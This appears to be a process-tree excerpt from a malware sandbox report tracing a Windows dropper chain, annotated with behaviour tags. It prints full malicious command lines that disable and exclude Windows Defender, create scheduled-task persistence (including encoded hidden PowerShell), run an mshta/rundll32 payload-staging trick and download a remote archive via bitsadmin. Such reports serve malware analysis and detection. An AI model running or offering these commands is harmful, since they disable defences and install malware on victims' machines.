C:\Users\Admin\Documents\5QcNLch4_NGoCePT6FzDxvrt.exe"C:\Users\Admin\Documents\5QcNLch4_NGoCePT6FzDxvrt.exe"6⤵
-
C:\Windows\SysWOW64\schtasks.exeschtasks /create /f /RU "Admin" /tr "C:\Program Files (x86)\PowerControl\PowerControl_Svc.exe" /tn "PowerControl LG" /sc ONLOGON /rl HIGHEST7⤵
- Executes dropped EXE
- Creates scheduled task(s)
-
C:\Windows\SysWOW64\schtasks.exeschtasks /create /f /RU "Admin" /tr "C:\Program Files (x86)\PowerControl\PowerControl_Svc.exe" /tn "PowerControl HR" /sc HOURLY /rl HIGHEST7⤵
- Creates scheduled task(s)
-
C:\Users\Admin\Documents\qT3dWYBP7ZsuOrwW4ZcUbjl6.exe"C:\Users\Admin\Documents\qT3dWYBP7ZsuOrwW4ZcUbjl6.exe"7⤵
- Checks computer location settings
-
C:\Users\Admin\Documents\ECpQxvrk7QdfeLYkQ6sFcXH5.exe"C:\Users\Admin\Documents\ECpQxvrk7QdfeLYkQ6sFcXH5.exe" /mixtwo8⤵
-
C:\Windows\SysWOW64\cmd.exe"C:\Windows\System32\cmd.exe" /c taskkill /im "ECpQxvrk7QdfeLYkQ6sFcXH5.exe" /f & erase "C:\Users\Admin\Documents\ECpQxvrk7QdfeLYkQ6sFcXH5.exe" & exit9⤵
-
C:\Windows\SysWOW64\taskkill.exetaskkill /im "ECpQxvrk7QdfeLYkQ6sFcXH5.exe" /f10⤵
- Kills process with taskkill
-
C:\Users\Admin\Documents\OUwWzxudrdRKwfe4TAMw2v9N.exe"C:\Users\Admin\Documents\OUwWzxudrdRKwfe4TAMw2v9N.exe"8⤵
- Drops Chrome extension
-
C:\Windows\SysWOW64\cmd.execmd.exe /c taskkill /f /im chrome.exe9⤵
-
C:\Windows\SysWOW64\taskkill.exetaskkill /f /im chrome.exe10⤵
- Kills process with taskkill
-
C:\Program Files\Google\Chrome\Application\chrome.exe"C:\Program Files\Google\Chrome\Application\chrome.exe"9⤵
-
C:\Program Files\Google\Chrome\Application\chrome.exe"C:\Program Files\Google\Chrome\Application\chrome.exe" --type=crashpad-handler "--user-data-dir=C:\Users\Admin\AppData\Local\Google\Chrome\User Data" /prefetch:7 --monitor-self-annotation=ptype=crashpad-handler "--database=C:\Users\Admin\AppData\Local\Google\Chrome\User Data\Crashpad" "--metrics-dir=C:\Users\Admin\AppData\Local\Google\Chrome\User Data" --url=https://clients2.google.com/cr/report --annotation=channel= --annotation=plat=Win64 --annotation=prod=Chrome --annotation=ver=89.0.4389.114 --initial-client-data=0xd8,0xdc,0xe0,0xb4,0xe4,0x7ff969644f50,0x7ff969644f60,0x7ff969644f7010⤵
-
C:\Users\Admin\Documents\6X0_BEDTzWiPAaJRWeA5gmnS.exe"C:\Users\Admin\Documents\6X0_BEDTzWiPAaJRWeA5gmnS.exe"8⤵
-
C:\Users\Admin\AppData\Local\Temp\tmp9DDD_tmp.exe"C:\Users\Admin\AppData\Local\Temp\tmp9DDD_tmp.exe"9⤵
- Suspicious use of SetThreadContext
-
C:\Windows\System32\Conhost.exe\??\C:\Windows\system32\conhost.exe 0xffffffff -ForceV110⤵
- Loads dropped DLL
-
C:\Users\Admin\AppData\Local\Temp\tmp9DDD_tmp.exeC:\Users\Admin\AppData\Local\Temp\tmp9DDD_tmp.exe10⤵
-
C:\Users\Admin\Documents\7JgZQWnBCdcBN6dMlS_l4DGk.exe"C:\Users\Admin\Documents\7JgZQWnBCdcBN6dMlS_l4DGk.exe"8⤵
-
C:\Users\Admin\AppData\Local\Temp\7zS88FE.tmp\Install.exe.\Install.exe9⤵
-
C:\Users\Admin\AppData\Local\Temp\7zS961D.tmp\Install.exe.\Install.exe /S /site_id "668658"10⤵
- Checks BIOS information in registry
- Drops file in System32 directory
- Enumerates system info in registry
-
C:\Windows\SysWOW64\cmd.exe"C:\Windows\System32\cmd.exe" /C forfiles /p c:\windows\system32 /m waitfor.exe /c "cmd /C powershell WMIC /NAMESPACE:\\root\Microsoft\Windows\Defender PATH MSFT_MpPreference call Add ThreatIDDefaultAction_Ids=2147735503 ThreatIDDefaultAction_Actions=6 Force=True" & forfiles /p c:\windows\system32 /m waitfor.exe /c "cmd /C powershell WMIC /NAMESPACE:\\root\Microsoft\Windows\Defender PATH MSFT_MpPreference call Add ThreatIDDefaultAction_Ids=2147737010 ThreatIDDefaultAction_Actions=6 Force=True" & forfiles /p c:\windows\system32 /m calc.exe /c "cmd /C powershell WMIC /NAMESPACE:\\root\Microsoft\Windows\Defender PATH MSFT_MpPreference call Add ThreatIDDefaultAction_Ids=2147737007 ThreatIDDefaultAction_Actions=6 Force=True" & forfiles /p c:\windows\system32 /m calc.exe /c "cmd /C powershell WMIC /NAMESPACE:\\root\Microsoft\Windows\Defender PATH MSFT_MpPreference call Add ThreatIDDefaultAction_Ids=2147737394 ThreatIDDefaultAction_Actions=6 Force=True" &11⤵
-
C:\Windows\SysWOW64\forfiles.exeforfiles /p c:\windows\system32 /m waitfor.exe /c "cmd /C powershell WMIC /NAMESPACE:\\root\Microsoft\Windows\Defender PATH MSFT_MpPreference call Add ThreatIDDefaultAction_Ids=2147735503 ThreatIDDefaultAction_Actions=6 Force=True"12⤵
-
C:\Windows\SysWOW64\cmd.exe/C powershell WMIC /NAMESPACE:\\root\Microsoft\Windows\Defender PATH MSFT_MpPreference call Add ThreatIDDefaultAction_Ids=2147735503 ThreatIDDefaultAction_Actions=6 Force=True13⤵
-
C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exepowershell WMIC /NAMESPACE:\\root\Microsoft\Windows\Defender PATH MSFT_MpPreference call Add ThreatIDDefaultAction_Ids=2147735503 ThreatIDDefaultAction_Actions=6 Force=True14⤵
-
C:\Windows\SysWOW64\Wbem\WMIC.exe"C:\Windows\System32\Wbem\WMIC.exe" /NAMESPACE:\\root\Microsoft\Windows\Defender PATH MSFT_MpPreference call Add ThreatIDDefaultAction_Ids=2147735503 ThreatIDDefaultAction_Actions=6 Force=True15⤵
-
C:\Windows\SysWOW64\forfiles.exeforfiles /p c:\windows\system32 /m waitfor.exe /c "cmd /C powershell WMIC /NAMESPACE:\\root\Microsoft\Windows\Defender PATH MSFT_MpPreference call Add ThreatIDDefaultAction_Ids=2147737010 ThreatIDDefaultAction_Actions=6 Force=True"12⤵
-
C:\Windows\SysWOW64\cmd.exe/C powershell WMIC /NAMESPACE:\\root\Microsoft\Windows\Defender PATH MSFT_MpPreference call Add ThreatIDDefaultAction_Ids=2147737010 ThreatIDDefaultAction_Actions=6 Force=True13⤵
-
C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exepowershell WMIC /NAMESPACE:\\root\Microsoft\Windows\Defender PATH MSFT_MpPreference call Add ThreatIDDefaultAction_Ids=2147737010 ThreatIDDefaultAction_Actions=6 Force=True14⤵
-
C:\Windows\SysWOW64\Wbem\WMIC.exe"C:\Windows\System32\Wbem\WMIC.exe" /NAMESPACE:\\root\Microsoft\Windows\Defender PATH MSFT_MpPreference call Add ThreatIDDefaultAction_Ids=2147737010 ThreatIDDefaultAction_Actions=6 Force=True15⤵
-
C:\Windows\SysWOW64\forfiles.exeforfiles /p c:\windows\system32 /m calc.exe /c "cmd /C powershell WMIC /NAMESPACE:\\root\Microsoft\Windows\Defender PATH MSFT_MpPreference call Add ThreatIDDefaultAction_Ids=2147737007 ThreatIDDefaultAction_Actions=6 Force=True"12⤵
-
C:\Windows\SysWOW64\cmd.exe/C powershell WMIC /NAMESPACE:\\root\Microsoft\Windows\Defender PATH MSFT_MpPreference call Add ThreatIDDefaultAction_Ids=2147737007 ThreatIDDefaultAction_Actions=6 Force=True13⤵
-
C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exepowershell WMIC /NAMESPACE:\\root\Microsoft\Windows\Defender PATH MSFT_MpPreference call Add ThreatIDDefaultAction_Ids=2147737007 ThreatIDDefaultAction_Actions=6 Force=True14⤵
-
C:\Windows\SysWOW64\Wbem\WMIC.exe"C:\Windows\System32\Wbem\WMIC.exe" /NAMESPACE:\\root\Microsoft\Windows\Defender PATH MSFT_MpPreference call Add ThreatIDDefaultAction_Ids=2147737007 ThreatIDDefaultAction_Actions=6 Force=True15⤵
-
C:\Windows\SysWOW64\forfiles.exeforfiles /p c:\windows\system32 /m calc.exe /c "cmd /C powershell WMIC /NAMESPACE:\\root\Microsoft\Windows\Defender PATH MSFT_MpPreference call Add ThreatIDDefaultAction_Ids=2147737394 ThreatIDDefaultAction_Actions=6 Force=True"12⤵
-
C:\Windows\SysWOW64\cmd.exe/C powershell WMIC /NAMESPACE:\\root\Microsoft\Windows\Defender PATH MSFT_MpPreference call Add ThreatIDDefaultAction_Ids=2147737394 ThreatIDDefaultAction_Actions=6 Force=True13⤵
-
C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exepowershell WMIC /NAMESPACE:\\root\Microsoft\Windows\Defender PATH MSFT_MpPreference call Add ThreatIDDefaultAction_Ids=2147737394 ThreatIDDefaultAction_Actions=6 Force=True14⤵
-
C:\Windows\SysWOW64\Wbem\WMIC.exe"C:\Windows\System32\Wbem\WMIC.exe" /NAMESPACE:\\root\Microsoft\Windows\Defender PATH MSFT_MpPreference call Add ThreatIDDefaultAction_Ids=2147737394 ThreatIDDefaultAction_Actions=6 Force=True15⤵
-
C:\Windows\SysWOW64\forfiles.exe"C:\Windows\System32\forfiles.exe" /p c:\windows\system32 /m cmd.exe /c "cmd /C REG ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Extensions\" /f /v \"exe\" /t REG_SZ /d 0 /reg:32® ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Extensions\" /f /v \"exe\" /t REG_SZ /d 0 /reg:64&"11⤵
-
C:\Windows\SysWOW64\cmd.exe/C REG ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Extensions" /f /v "exe" /t REG_SZ /d 0 /reg:32® ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Extensions" /f /v "exe" /t REG_SZ /d 0 /reg:64&12⤵
-
\??\c:\windows\SysWOW64\reg.exeREG ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Extensions" /f /v "exe" /t REG_SZ /d 0 /reg:3213⤵
-
\??\c:\windows\SysWOW64\reg.exeREG ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Extensions" /f /v "exe" /t REG_SZ /d 0 /reg:6413⤵
-
C:\Windows\SysWOW64\forfiles.exe"C:\Windows\System32\forfiles.exe" /p c:\windows\system32 /m cmd.exe /c "cmd /C REG ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Spynet\" /f /v \"SpyNetReporting\" /t REG_DWORD /d 0 /reg:32® ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Spynet\" /f /v \"SpyNetReporting\" /t REG_DWORD /d 0 /reg:64&"11⤵
-
C:\Windows\SysWOW64\cmd.exe/C REG ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Spynet" /f /v "SpyNetReporting" /t REG_DWORD /d 0 /reg:32® ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Spynet" /f /v "SpyNetReporting" /t REG_DWORD /d 0 /reg:64&12⤵
-
\??\c:\windows\SysWOW64\reg.exeREG ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Spynet" /f /v "SpyNetReporting" /t REG_DWORD /d 0 /reg:3213⤵
-
\??\c:\windows\SysWOW64\reg.exeREG ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Spynet" /f /v "SpyNetReporting" /t REG_DWORD /d 0 /reg:6413⤵
-
C:\Windows\SysWOW64\schtasks.exeschtasks /CREATE /TN "gblMPxHut" /SC once /ST 20:46:22 /F /RU "Admin" /TR "powershell -WindowStyle Hidden -EncodedCommand cwB0AGEAcgB0AC0AcAByAG8AYwBlAHMAcwAgAC0AVwBpAG4AZABvAHcAUwB0AHkAbABlACAASABpAGQAZABlAG4AIABnAHAAdQBwAGQAYQB0AGUALgBlAHgAZQAgAC8AZgBvAHIAYwBlAA=="11⤵
- Creates scheduled task(s)
-
C:\Windows\SysWOW64\schtasks.exeschtasks /run /I /tn "gblMPxHut"11⤵
-
C:\Windows\SysWOW64\schtasks.exeschtasks /DELETE /F /TN "gblMPxHut"11⤵
-
C:\Windows\SysWOW64\schtasks.exeschtasks /CREATE /TN "bvmcjEjDUxHOOxIZsK" /SC once /ST 21:38:00 /RU "SYSTEM" /TR "\"C:\Users\Admin\AppData\Local\Temp\prNnatYmCsQFEeCzn\OFTJvYQhcKRKyYZ\hdnNIrN.exe\" uG /site_id 668658 /S" /V1 /F11⤵
- Drops file in Windows directory
- Creates scheduled task(s)
-
C:\Windows\System32\Conhost.exe\??\C:\Windows\system32\conhost.exe 0xffffffff -ForceV112⤵
-
C:\Users\Admin\Documents\RUpLHkrv85jo7E7OwfaBdEAd.exe"C:\Users\Admin\Documents\RUpLHkrv85jo7E7OwfaBdEAd.exe"8⤵
-
C:\Windows\SysWOW64\mshta.exe"C:\Windows\System32\mshta.exe" vbSCRiPt: cloSe ( cReATEOBJecT ( "WScRIPt.SHelL" ). RUn ( "C:\Windows\system32\cmd.exe /c copY /Y ""C:\Users\Admin\Documents\RUpLHkrv85jo7E7OwfaBdEAd.exe"" SkVPVS3t6Y8W.EXe && STart SkVPVs3t6Y8W.exE /phmOv~geMVZhd~P51OGqJQYYUK & iF """" == """" for %U In ( ""C:\Users\Admin\Documents\RUpLHkrv85jo7E7OwfaBdEAd.exe"" ) do taskkill -F -Im ""%~nXU"" " , 0 , trUE ) )9⤵
-
C:\Windows\SysWOW64\cmd.exe"C:\Windows\system32\cmd.exe" /c copY /Y "C:\Users\Admin\Documents\RUpLHkrv85jo7E7OwfaBdEAd.exe" SkVPVS3t6Y8W.EXe && STart SkVPVs3t6Y8W.exE /phmOv~geMVZhd~P51OGqJQYYUK & iF "" == "" for %U In ( "C:\Users\Admin\Documents\RUpLHkrv85jo7E7OwfaBdEAd.exe" ) do taskkill -F -Im "%~nXU"10⤵
-
C:\Users\Admin\AppData\Local\Temp\SkVPVS3t6Y8W.EXeSkVPVs3t6Y8W.exE /phmOv~geMVZhd~P51OGqJQYYUK11⤵
-
C:\Windows\SysWOW64\mshta.exe"C:\Windows\System32\mshta.exe" vbSCRiPt: cloSe ( cReATEOBJecT ( "WScRIPt.SHelL" ). RUn ( "C:\Windows\system32\cmd.exe /c copY /Y ""C:\Users\Admin\AppData\Local\Temp\SkVPVS3t6Y8W.EXe"" SkVPVS3t6Y8W.EXe && STart SkVPVs3t6Y8W.exE /phmOv~geMVZhd~P51OGqJQYYUK & iF ""/phmOv~geMVZhd~P51OGqJQYYUK "" == """" for %U In ( ""C:\Users\Admin\AppData\Local\Temp\SkVPVS3t6Y8W.EXe"" ) do taskkill -F -Im ""%~nXU"" " , 0 , trUE ) )12⤵
-
C:\Windows\SysWOW64\cmd.exe"C:\Windows\system32\cmd.exe" /c copY /Y "C:\Users\Admin\AppData\Local\Temp\SkVPVS3t6Y8W.EXe" SkVPVS3t6Y8W.EXe && STart SkVPVs3t6Y8W.exE /phmOv~geMVZhd~P51OGqJQYYUK & iF "/phmOv~geMVZhd~P51OGqJQYYUK " == "" for %U In ( "C:\Users\Admin\AppData\Local\Temp\SkVPVS3t6Y8W.EXe" ) do taskkill -F -Im "%~nXU"13⤵
-
C:\Windows\SysWOW64\mshta.exe"C:\Windows\System32\mshta.exe" vBsCRipT: CloSE ( CReaTEoBJEct ( "WSCRIPT.SHElL" ). rUn ("cMd /q /C eCHo | SET /P = ""MZ"" > yW7bB.DeE &COpy /Y /b YW7bB.DEe + YLRXm6O.QZ + 3UII17.UI + EZZS.MDf + Uts09Z.AiZ + JNYESn.Co FUEJ5.QM & StARt control .\FUEj5.QM " , 0 , tRuE ) )12⤵
- Blocklisted process makes network request
- Suspicious behavior: EnumeratesProcesses
-
C:\Windows\SysWOW64\cmd.exe"C:\Windows\System32\cmd.exe" /q /C eCHo | SET /P = "MZ" > yW7bB.DeE &COpy /Y /b YW7bB.DEe + YLRXm6O.QZ+ 3UII17.UI + EZZS.MDf + Uts09Z.AiZ + JNYESn.Co FUEJ5.QM& StARt control .\FUEj5.QM13⤵
-
C:\Windows\SysWOW64\cmd.exeC:\Windows\system32\cmd.exe /S /D /c" eCHo "14⤵
-
C:\Windows\SysWOW64\cmd.exeC:\Windows\system32\cmd.exe /S /D /c" SET /P = "MZ" 1>yW7bB.DeE"14⤵
-
C:\Windows\SysWOW64\control.execontrol .\FUEj5.QM14⤵
-
C:\Windows\SysWOW64\rundll32.exe"C:\Windows\system32\rundll32.exe" Shell32.dll,Control_RunDLL .\FUEj5.QM15⤵
-
C:\Windows\system32\RunDll32.exeC:\Windows\system32\RunDll32.exe Shell32.dll,Control_RunDLL .\FUEj5.QM16⤵
-
C:\Windows\SysWOW64\rundll32.exe"C:\Windows\SysWOW64\rundll32.exe" "C:\Windows\SysWOW64\shell32.dll",#44 .\FUEj5.QM17⤵
- Blocklisted process makes network request
- Drops file in Drivers directory
- Loads dropped DLL
- Adds Run key to start application
-
C:\Windows\SysWOW64\taskkill.exetaskkill -F -Im "RUpLHkrv85jo7E7OwfaBdEAd.exe"11⤵
- Kills process with taskkill
-
C:\Users\Admin\Documents\yWwu4lJ0uJadAHnVzpydnDkG.exe"C:\Users\Admin\Documents\yWwu4lJ0uJadAHnVzpydnDkG.exe"8⤵
- Suspicious use of SetThreadContext
-
C:\Users\Admin\Documents\yWwu4lJ0uJadAHnVzpydnDkG.exe"C:\Users\Admin\Documents\yWwu4lJ0uJadAHnVzpydnDkG.exe"9⤵
-
C:\Users\Admin\Documents\6FWMzlXnCtqJ3wOoKIv1m2Cg.exe"C:\Users\Admin\Documents\6FWMzlXnCtqJ3wOoKIv1m2Cg.exe"8⤵
-
C:\Users\Admin\Documents\JV6hGwXs3Mf1g2rSJrCdh6Bp.exe"C:\Users\Admin\Documents\JV6hGwXs3Mf1g2rSJrCdh6Bp.exe"8⤵
-
C:\Users\Admin\Documents\5AYhJBzk5DK53YJC_wBu_I8r.exe"C:\Users\Admin\Documents\5AYhJBzk5DK53YJC_wBu_I8r.exe" silent8⤵
- Checks whether UAC is enabled
-
C:\Users\Admin\Documents\r9A3m_8Kh57rxeYKJ11wn3wk.exe"C:\Users\Admin\Documents\r9A3m_8Kh57rxeYKJ11wn3wk.exe"8⤵
-
C:\Users\Admin\AppData\Local\Temp\is-MBPBC.tmp\r9A3m_8Kh57rxeYKJ11wn3wk.tmp"C:\Users\Admin\AppData\Local\Temp\is-MBPBC.tmp\r9A3m_8Kh57rxeYKJ11wn3wk.tmp" /SL5="$206D2,506127,422400,C:\Users\Admin\Documents\r9A3m_8Kh57rxeYKJ11wn3wk.exe"9⤵
-
C:\Users\Admin\AppData\Local\Temp\is-BQ591.tmp\Sharefolder.exe"C:\Users\Admin\AppData\Local\Temp\is-BQ591.tmp\Sharefolder.exe" /S /UID=270910⤵
-
C:\Users\Admin\AppData\Local\Temp\a2-4dae0-114-8a9a2-9cf90cea4029c\Vaegovuzhoki.exe"C:\Users\Admin\AppData\Local\Temp\a2-4dae0-114-8a9a2-9cf90cea4029c\Vaegovuzhoki.exe"11⤵
- Executes dropped EXE
- Checks computer location settings
-
C:\Program Files\Windows Photo Viewer\IFIDVXLFEO\foldershare.exe"C:\Program Files\Windows Photo Viewer\IFIDVXLFEO\foldershare.exe" /VERYSILENT11⤵
-
C:\Users\Admin\AppData\Local\Temp\b3-2f938-056-5e895-8e8e99a95eba9\Jajeshywime.exe"C:\Users\Admin\AppData\Local\Temp\b3-2f938-056-5e895-8e8e99a95eba9\Jajeshywime.exe"11⤵
- Checks computer location settings
- Checks whether UAC is enabled
- Drops file in Windows directory
- Modifies Internet Explorer settings
- Modifies registry class
-
C:\Windows\System32\cmd.exe"C:\Windows\System32\cmd.exe" /k C:\Users\Admin\AppData\Local\Temp\f053uf2v.xkc\GcleanerEU.exe /eufive & exit12⤵
-
C:\Users\Admin\AppData\Local\Temp\f053uf2v.xkc\GcleanerEU.exeC:\Users\Admin\AppData\Local\Temp\f053uf2v.xkc\GcleanerEU.exe /eufive13⤵
-
C:\Windows\SysWOW64\cmd.exe"C:\Windows\System32\cmd.exe" /c taskkill /im "GcleanerEU.exe" /f & erase "C:\Users\Admin\AppData\Local\Temp\f053uf2v.xkc\GcleanerEU.exe" & exit14⤵
-
C:\Windows\SysWOW64\taskkill.exetaskkill /im "GcleanerEU.exe" /f15⤵
- Kills process with taskkill
-
C:\Windows\System32\cmd.exe"C:\Windows\System32\cmd.exe" /k C:\Users\Admin\AppData\Local\Temp\lsztkloi.nb4\installer.exe /qn CAMPAIGN="654" & exit12⤵
-
C:\Windows\System32\Conhost.exe\??\C:\Windows\system32\conhost.exe 0xffffffff -ForceV113⤵
-
C:\Users\Admin\AppData\Local\Temp\lsztkloi.nb4\installer.exeC:\Users\Admin\AppData\Local\Temp\lsztkloi.nb4\installer.exe /qn CAMPAIGN="654"13⤵
-
C:\Windows\System32\cmd.exe"C:\Windows\System32\cmd.exe" /k C:\Users\Admin\AppData\Local\Temp\uazytcol.evz\any.exe & exit12⤵
-
C:\Users\Admin\AppData\Local\Temp\uazytcol.evz\any.exeC:\Users\Admin\AppData\Local\Temp\uazytcol.evz\any.exe13⤵
-
C:\Windows\System32\cmd.exe"C:\Windows\System32\cmd.exe" /k C:\Users\Admin\AppData\Local\Temp\oyvgklem.dnf\gcleaner.exe /mixfive & exit12⤵
-
C:\Users\Admin\AppData\Local\Temp\oyvgklem.dnf\gcleaner.exeC:\Users\Admin\AppData\Local\Temp\oyvgklem.dnf\gcleaner.exe /mixfive13⤵
-
C:\Windows\SysWOW64\cmd.exe"C:\Windows\System32\cmd.exe" /c taskkill /im "gcleaner.exe" /f & erase "C:\Users\Admin\AppData\Local\Temp\oyvgklem.dnf\gcleaner.exe" & exit14⤵
-
C:\Windows\SysWOW64\taskkill.exetaskkill /im "gcleaner.exe" /f15⤵
- Kills process with taskkill
-
C:\Windows\System32\cmd.exe"C:\Windows\System32\cmd.exe" /k C:\Users\Admin\AppData\Local\Temp\toscje42.2r2\autosubplayer.exe /S & exit12⤵
-
C:\Windows\System32\Conhost.exe\??\C:\Windows\system32\conhost.exe 0xffffffff -ForceV113⤵
-
C:\Users\Admin\AppData\Local\Temp\toscje42.2r2\autosubplayer.exeC:\Users\Admin\AppData\Local\Temp\toscje42.2r2\autosubplayer.exe /S13⤵
- Loads dropped DLL
- Drops file in Program Files directory
-
C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exepowershell -inputformat none -ExecutionPolicy RemoteSigned -File "C:\Users\Admin\AppData\Local\Temp\nsp648B.tmp\tempfile.ps1"14⤵
-
C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exepowershell -inputformat none -ExecutionPolicy RemoteSigned -File "C:\Users\Admin\AppData\Local\Temp\nsp648B.tmp\tempfile.ps1"14⤵
-
C:\Windows\System32\Conhost.exe\??\C:\Windows\system32\conhost.exe 0xffffffff -ForceV115⤵
-
C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exepowershell -inputformat none -ExecutionPolicy RemoteSigned -File "C:\Users\Admin\AppData\Local\Temp\nsp648B.tmp\tempfile.ps1"14⤵
-
C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exepowershell -inputformat none -ExecutionPolicy RemoteSigned -File "C:\Users\Admin\AppData\Local\Temp\nsp648B.tmp\tempfile.ps1"14⤵
-
C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exepowershell -inputformat none -ExecutionPolicy RemoteSigned -File "C:\Users\Admin\AppData\Local\Temp\nsp648B.tmp\tempfile.ps1"14⤵
-
C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exepowershell -inputformat none -ExecutionPolicy RemoteSigned -File "C:\Users\Admin\AppData\Local\Temp\nsp648B.tmp\tempfile.ps1"14⤵
-
C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exepowershell -inputformat none -ExecutionPolicy RemoteSigned -File "C:\Users\Admin\AppData\Local\Temp\nsp648B.tmp\tempfile.ps1"14⤵
- Checks for any installed AV software in registry
-
C:\Windows\System32\Conhost.exe\??\C:\Windows\system32\conhost.exe 0xffffffff -ForceV115⤵
-
C:\Windows\SysWOW64\bitsadmin.exe"bitsadmin" /Transfer helper http://lighteningstoragecenter.com/data/data.7z C:\zip.7z14⤵
- Download via BitsAdmin
-
C:\Program Files (x86)\lighteningplayer\data_load.exe"C:\Program Files (x86)\lighteningplayer\data_load.exe" -piKZNpnxj7ps2Vba -y x C:\zip.7z -o"C:\Program Files\temp_files\"14⤵
- Drops file in Program Files directory
-
C:\Program Files (x86)\lighteningplayer\data_load.exe"C:\Program Files (x86)\lighteningplayer\data_load.exe" -pZy3DKDGFkSCqK3x -y x C:\zip.7z -o"C:\Program Files\temp_files\"14⤵
-
C:\Windows\System32\Conhost.exe\??\C:\Windows\system32\conhost.exe 0xffffffff -ForceV115⤵
-
C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exepowershell -inputformat none -ExecutionPolicy RemoteSigned -File "C:\Users\Admin\AppData\Local\Temp\nsp648B.tmp\tempfile.ps1"14⤵
-
C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exepowershell -inputformat none -ExecutionPolicy RemoteSigned -File "C:\Users\Admin\AppData\Local\Temp\nsp648B.tmp\tempfile.ps1"14⤵
-
C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exepowershell -inputformat none -ExecutionPolicy RemoteSigned -File "C:\Users\Admin\AppData\Local\Temp\nsp648B.tmp\tempfile.ps1"14⤵
-
C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exepowershell -inputformat none -ExecutionPolicy RemoteSigned -File "C:\Users\Admin\AppData\Local\Temp\nsp648B.tmp\tempfile.ps1"14⤵
-
C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exepowershell -inputformat none -ExecutionPolicy RemoteSigned -File "C:\Users\Admin\AppData\Local\Temp\nsp648B.tmp\tempfile.ps1"14⤵
-
C:\Windows\SysWOW64\rundll32.exeC:\Windows\System32\rundll32.exe "C:\Program Files (x86)\OnpGSK\OnpGSK.dll" OnpGSK14⤵
-
C:\Windows\system32\rundll32.exeC:\Windows\System32\rundll32.exe "C:\Program Files (x86)\OnpGSK\OnpGSK.dll" OnpGSK15⤵
- Drops file in System32 directory
-
C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exepowershell -inputformat none -ExecutionPolicy RemoteSigned -File "C:\Users\Admin\AppData\Local\Temp\nsp648B.tmp\tempfile.ps1"14⤵
-
C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exepowershell -inputformat none -ExecutionPolicy RemoteSigned -File "C:\Users\Admin\AppData\Local\Temp\nsp648B.tmp\tempfile.ps1"14⤵
-
C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exepowershell -inputformat none -ExecutionPolicy RemoteSigned -File "C:\Users\Admin\AppData\Local\Temp\nsp648B.tmp\tempfile.ps1"14⤵
-
C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exepowershell -inputformat none -ExecutionPolicy RemoteSigned -File "C:\Users\Admin\AppData\Local\Temp\nsp648B.tmp\tempfile.ps1"14⤵
-
C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exepowershell -inputformat none -ExecutionPolicy RemoteSigned -File "C:\Users\Admin\AppData\Local\Temp\nsp648B.tmp\tempfile.ps1"14⤵
-
C:\Program Files (x86)\lighteningplayer\lighteningplayer-cache-gen.exe"C:\Program Files (x86)\lighteningplayer\lighteningplayer-cache-gen.exe" C:\Program Files (x86)\lighteningplayer\plugins\ /SILENT14⤵
- Drops file in Program Files directory
-
C:\Users\Admin\Documents\r9lvaFV2l9JrunbHLyDrpZdG.exe"C:\Users\Admin\Documents\r9lvaFV2l9JrunbHLyDrpZdG.exe"6⤵
- Checks BIOS information in registry
- Checks whether UAC is enabled
- Suspicious use of NtSetInformationThreadHideFromDebugger
-
C:\Users\Admin\Documents\PgqZ3lLnJEACiB9AXLX9zQw9.exe"C:\Users\Admin\Documents\PgqZ3lLnJEACiB9AXLX9zQw9.exe"6⤵
- Loads dropped DLL
- Checks processor information in registry
-
C:\Windows\SysWOW64\cmd.exe"C:\Windows\System32\cmd.exe" /c taskkill /im PgqZ3lLnJEACiB9AXLX9zQw9.exe /f & timeout /t 6 & del /f /q "C:\Users\Admin\Documents\PgqZ3lLnJEACiB9AXLX9zQw9.exe" & del C:\ProgramData\*.dll & exit7⤵
-
C:\Windows\SysWOW64\taskkill.exetaskkill /im PgqZ3lLnJEACiB9AXLX9zQw9.exe /f8⤵
- Kills process with taskkill
-
C:\Windows\SysWOW64\timeout.exetimeout /t 68⤵
- Executes dropped EXE
- Delays execution with timeout.exe
-
C:\Users\Admin\Documents\i_rGvLQiUYt3ACuBZWgT2jBm.exe"C:\Users\Admin\Documents\i_rGvLQiUYt3ACuBZWgT2jBm.exe"6⤵
- Checks BIOS information in registry
- Checks whether UAC is enabled
- Suspicious use of NtSetInformationThreadHideFromDebugger
-
C:\Users\Admin\Documents\m3TwyiAt0yhAoEFKtzVW3f4w.exe"C:\Users\Admin\Documents\m3TwyiAt0yhAoEFKtzVW3f4w.exe"6⤵
- Suspicious use of SetThreadContext
-
C:\Users\Admin\Documents\m3TwyiAt0yhAoEFKtzVW3f4w.exe"C:\Users\Admin\Documents\m3TwyiAt0yhAoEFKtzVW3f4w.exe"7⤵
-
